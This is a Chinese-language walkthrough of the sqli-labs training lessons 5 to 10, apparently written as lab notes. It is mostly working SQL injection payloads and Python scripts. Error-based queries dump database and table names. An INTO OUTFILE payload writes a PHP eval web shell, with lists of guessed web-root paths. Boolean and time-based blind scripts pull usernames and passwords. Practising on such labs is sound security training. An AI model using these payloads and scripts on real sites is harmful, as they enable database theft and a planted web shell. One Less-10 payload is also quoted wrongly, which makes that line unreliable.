有mysql的错误显示
本质是 floor(rand()*2) 与 group by 组合时触发的主键重复（Duplicate entry）报错
参考文章:https://www.cnblogs.com/BloodZero/p/4660971.html
payload1:查询库名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a; ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key' payload2:查询表名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1242 (21000): Subquery returns more than 1 row 这里提示说结果子查询超出一行,确认问题是处在这里
payload3:用limit一个一个查询表名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key' payload4:查询列名 mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key' payload:查询内容 mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a; ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'
6与5差别在单引号和双引号
payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(*),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+
首先吐槽一下这里的闭合方式：试了半天都没成功，看了源码才知道要用两个括号闭合。
这一题需要用sql语句来进行文件操作。
需要用到函数select 'xxx' into outfile 'xxx';
使用 into outfile 时需要给出目标文件的绝对路径，而这个路径只能凭经验猜测。
根据系统和数据库猜测,如winserver的iis默认路径是c:/inetpub/wwwroot/,这好像说偏了,这是asp的,但知道也好
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等
apache 就/var/www/htm,/var/www/html/htdocs
payload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+
相比第五题，这一题关闭了报错显示。
分析一下语句:SELECT * FROM users WHERE id='1'and ((select database())='secrity')-- ' LIMIT 0,1
没有报错信息，只能根据页面是否返回 You are in... 来判断 SQL 语句的执行结果。
那么找到可以执行的语句
mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200); Empty set (0.00 sec) mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2); +----+----------+----------+ | id | username | password | +----+----------+----------+ | 1 | Dumb | Dumb | +----+----------+----------+ 1 row in set (0.00 sec)
附上脚本
import requests
from tqdm import tqdm
import time

# NOTE(review): this block was pasted as a single collapsed line; the line
# breaks and indentation below are reconstructed from the syntax. Confirm
# against the original file before relying on the nesting.


def bp(name, payload):
    """Recover a string one character at a time through a boolean oracle.

    ``payload`` is a URL query fragment with two ``{}`` slots: the 1-based
    character position and an ASCII threshold. For each position the
    function binary-searches the threshold between 33 and 127, treating the
    presence of "You are in..." in the response body as "true" (the
    character code is above the threshold). Recovered characters are
    appended to ``name``.

    Args:
        name: prefix already recovered (the loop appends to it).
        payload: format string for the query fragment; it is appended to the
            module-level ``url``, which is assigned after this function and
            must exist before the call.

    Returns:
        ``name`` with the recovered characters appended.

    Note (defender view): each character costs roughly seven near-identical
    GET requests that differ only in two numeric literals, so a long run of
    such requests against one endpoint is the pattern to alert on. A
    parameterized query on the server removes the oracle altogether.
    """
    # At most 199 characters per string; tqdm only draws the progress bar.
    for j in tqdm(range(1, 200)):
        # Search window on the ASCII code (`min`/`max` shadow the builtins).
        min = 33
        max = 127
        while abs(min - max) > 1:
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            # The page text is the oracle: the marker is present only when
            # the injected comparison is true.
            if ("You are in..." in rsp.text):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        # The window closes with the character code equal to max.
        name += chr(max)
        print(name)
        # Stop heuristic: two identical consecutive characters are taken to
        # mean the end of the string was passed (this also fires on any
        # genuine doubled letter).
        if(name[-1:]==name[-2:-1]):
            break
    return name


url="http://sql.test/Less-8/"
databasename=""
tablename=""
t1=time.time()
payload1 = '?id=1%27and%20(ascii(mid(database(),{},1))>{})%23'
databasename=bp(databasename,payload1)
payload2 ="?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{})%23"
tablename=bp(tablename,payload2)
t2=time.time()
print("总共时长为:")
print(t2-t1)
print(databasename+"\n"+tablename)

# Below is the second script (originally "#下面是第二个脚本"). It redefines
# bp() identically and targets the same url.
import requests
from tqdm import tqdm
def bp(name,payload):
    """Identical to bp() above (boolean oracle on "You are in...")."""
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            if ("You are in..." in rsp.text):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name

url="http://sql.test/Less-8/"
usernamepassword=""
payload3 ="?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password%20separator%20'<br>')%20from%20users),{},1))>{})%23"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)
看一下源码，不论 SQL 查询结果是否为空，页面都返回 You are in...，因此无法再按页面内容做布尔判断。
想办法构造一下payload,测试成功:?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+
import requests
from tqdm import tqdm
import time

# NOTE(review): this block was pasted as a single collapsed line; the line
# breaks and indentation below are reconstructed from the syntax. Confirm
# against the original file before relying on the nesting.


def bp(name, payload):
    """Recover a string one character at a time through a timing oracle.

    Same search as the Less-8 boolean variant: ``payload`` has two ``{}``
    slots (1-based character position, ASCII threshold) and each position is
    binary-searched between 33 and 127. Here the comparison result is read
    from the response time — a request that takes more than 5 seconds
    counts as "true".

    Args:
        name: prefix already recovered; characters are appended to it.
        payload: format string for the query fragment, appended to the
            module-level ``url`` (assigned after this function).

    Returns:
        ``name`` with the recovered characters appended.

    Note: the payloads below place sleep(0.3) inside the WHERE clause, so
    presumably the delay is incurred once per row the query evaluates, which
    would explain a 5 s threshold for a 0.3 s sleep — TODO confirm. From the
    defender's side this is a burst of requests to one endpoint whose
    latencies cluster at two distinct values; a parameterized query removes
    the injection point and with it the oracle.
    """
    for j in tqdm(range(1, 200)):
        # Search window on the ASCII code (`min`/`max` shadow the builtins).
        min = 33
        max = 127
        while abs(min - max) > 1:
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            # Wall-clock time around the request is the oracle.
            t1=time.time()
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            t2=time.time()
            if (t2-t1>5):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        # The window closes with the character code equal to max.
        name += chr(max)
        print(name)
        # Stop heuristic: two identical consecutive characters are taken to
        # mean the end of the string was passed (also fires on a genuine
        # doubled letter).
        if(name[-1:]==name[-2:-1]):
            break
    return name


databasename =''
tablename =''
url="http://sql.test/Less-9/"
# payload1 = '?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
# databasename=bp(databasename,payload1)
# The database name is hard-coded here instead of being recovered.
databasename='security'
payload2 ="?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+"
tablename=bp(tablename,payload2)

# Below is the script for the column contents (originally "#下面是求字段的脚本").
# The author's note: this payload took a long time to get right — it is long
# and easy to misread, so check it carefully.
import requests
import time
from tqdm import tqdm
def bp(name,payload):
    """Identical to bp() above (timing oracle, 5 s threshold)."""
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            t1 = time.time()
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            t2 = time.time()
            if (t2 - t1 > 5):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name

url="http://sql.test/Less-9/"
usernamepassword=""
# Earlier attempts at the payload, left commented out by the author:
# payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)
相比于第九题将单引号改成了双引号
import requests
from tqdm import tqdm
import time

# NOTE(review): this block was pasted as a single collapsed line; the line
# breaks and indentation below are reconstructed from the syntax. Confirm
# against the original file before relying on the nesting.


def bp(name, payload):
    """Recover a string one character at a time through a timing oracle.

    Same routine as the Less-9 script: ``payload`` has two ``{}`` slots
    (1-based character position, ASCII threshold); each position is
    binary-searched between 33 and 127, and a response that takes more than
    5 seconds is read as "true". Only the URL and the quoting in the payloads
    differ from Less-9.

    Args:
        name: prefix already recovered; characters are appended to it.
        payload: format string for the query fragment, appended to the
            module-level ``url`` (assigned after this function).

    Returns:
        ``name`` with the recovered characters appended.
    """
    for j in tqdm(range(1, 200)):
        # Search window on the ASCII code (`min`/`max` shadow the builtins).
        min = 33
        max = 127
        while abs(min - max) > 1:
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            # Wall-clock time around the request is the oracle.
            t1=time.time()
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            t2=time.time()
            if (t2-t1>5):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        # The window closes with the character code equal to max.
        name += chr(max)
        print(name)
        # Stop heuristic: two identical consecutive characters are taken to
        # mean the end of the string was passed (also fires on a genuine
        # doubled letter).
        if(name[-1:]==name[-2:-1]):
            break
    return name


databasename =''
tablename =''
url="http://sql.test/Less-10/"
payload1 ='?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
databasename=bp(databasename,payload1)
# The recovered value is immediately overwritten with a hard-coded name.
databasename='security'
# NOTE(review): with the outer quotes switched to single quotes, the
# "+databasename+" segment is itself a string literal here, so the three
# adjacent literals concatenate and the query text ends up containing
# +databasename+ rather than the value of databasename — compare with the
# Less-9 version of this line; verify before reuse.
payload2 ='?id=0"or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+'
tablename=bp(tablename,payload2)

# Below is the script for the column contents (originally "#下面是求字段的脚本"),
# left entirely commented out by the author; it is the Less-9 script with the
# final payload re-quoted.
# import requests
# import time
# from tqdm import tqdm
#
# def bp(name,payload):
#     for j in tqdm(range(1, 200)):
#         min = 33
#         max = 127
#         while abs(min - max) > 1: # s
#             mid = int((min + max) * 0.5)
#             payloadd = payload.format(str(j), str(mid))
#             t1 = time.time()
#             rsp = requests.get(url=url + payloadd)
#             rsp.encoding = 'utf-8'
#             t2 = time.time()
#             if (t2 - t1 > 5):
#                 min = mid
#             else:
#                 max = mid
#             # print(str(min)+"-"+str(max))
#         name += chr(max)
#         print(name)
#         if(name[-1:]==name[-2:-1]):
#             break
#     return name
#
# url="http://sql.test/Less-9/"
# usernamepassword=""
# # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
# payload3 ='?id=0"or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+'
# usernamepassword=bp(usernamepassword,payload3)
# print(usernamepassword)
非标准解法